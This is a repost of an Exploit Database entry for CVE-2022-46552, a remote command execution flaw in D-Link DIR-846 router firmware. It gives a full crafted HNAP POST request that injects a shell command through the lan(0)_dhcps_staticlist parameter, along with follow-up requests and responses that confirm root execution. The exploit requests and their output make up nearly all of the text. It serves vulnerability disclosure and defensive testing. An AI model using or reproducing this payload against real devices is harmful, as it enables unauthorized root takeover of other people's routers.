D-Link DIR-846 – Remote Command Execution (RCE) vulnerability

• Exploit Database
• 96 阅读

• 作者： Françoa Taffarel
  日期： 2023-04-05
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51243/

• # Exploit Title: D-Link DIR-846 - Remote Command Execution (RCE) vulnerability 
  # Google Dork: NA
  # Date: 30/01/2023
  # Exploit Author: Françoa Taffarel
  # Vendor Homepage:
  Roteador Wireless MU-MIMO Gigabit AC1200
  # Software Link:
  https://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip
  # Version: DIR846enFW100A53DBR-Retail
  # Tested on: D-LINK DIR-846
  # CVE : CVE-2022-46552
  
  D-Link DIR-846 Firmware FW100A53DBR was discovered to contain a remote
  command execution (RCE) vulnerability via the lan(0)_dhcps_staticlist
  parameter. This vulnerability is exploited via a crafted POST request.
  
  ### Malicious POST Request
  ```
  POST /HNAP1/ HTTP/1.1
  Host: 192.168.0.1
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101
  Firefox/107.0
  Accept: application/json
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Content-Type: application/json
  SOAPACTION: "http://purenetworks.com/HNAP1/SetIpMacBindSettings"
  HNAP_AUTH: 0107E0F97B1ED75C649A875212467F1E 1669853009285
  Content-Length: 171
  Origin: http://192.168.0.1
  Connection: close
  Referer: http://192.168.0.1/AdvMacBindIp.html?t=1669852917775
  Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=idh0QaG7;
  PrivateKey=DBA9B02F550ECD20E7D754A131BE13DF; timeout=4
  
  {"SetIpMacBindSettings":{"lan_unit":"0","lan(0)_dhcps_staticlist":"1,$(id>rce_confirmed),02:42:d6:f9:dc:4e,192.168.0.15"}}
  ```
  
  
  ### Response
  
  ```
  HTTP/1.1 200 OK
  X-Powered-By: PHP/7.1.9
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  Content-type: text/html; charset=UTF-8
  Connection: close
  Date: Thu, 01 Dec 2022 11:03:54 GMT
  Server: lighttpd/1.4.35
  Content-Length: 68
  
  {"SetIpMacBindSettingsResponse":{"SetIpMacBindSettingsResult":"OK"}}
  ```
  
  
  ### Data from RCE Request
  
  ```
  GET /HNAP1/rce_confirmed HTTP/1.1
  Host: 192.168.0.1
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101
  Firefox/107.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Connection: close
  Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=ljZlHjKV;
  PrivateKey=846232FD25AA8BEC8550EF6466B168D9; timeout=1
  Upgrade-Insecure-Requests: 1
  ```
  
  
  ### Response
  
  ```
  HTTP/1.1 200 OK
  Content-Type: application/octet-stream
  Accept-Ranges: bytes
  Content-Length: 24
  Connection: close
  Date: Thu, 01 Dec 2022 23:24:28 GMT
  Server: lighttpd/1.4.35
  
  uid=0(root) gid=0(root)
  ```
  

  Python

  Copy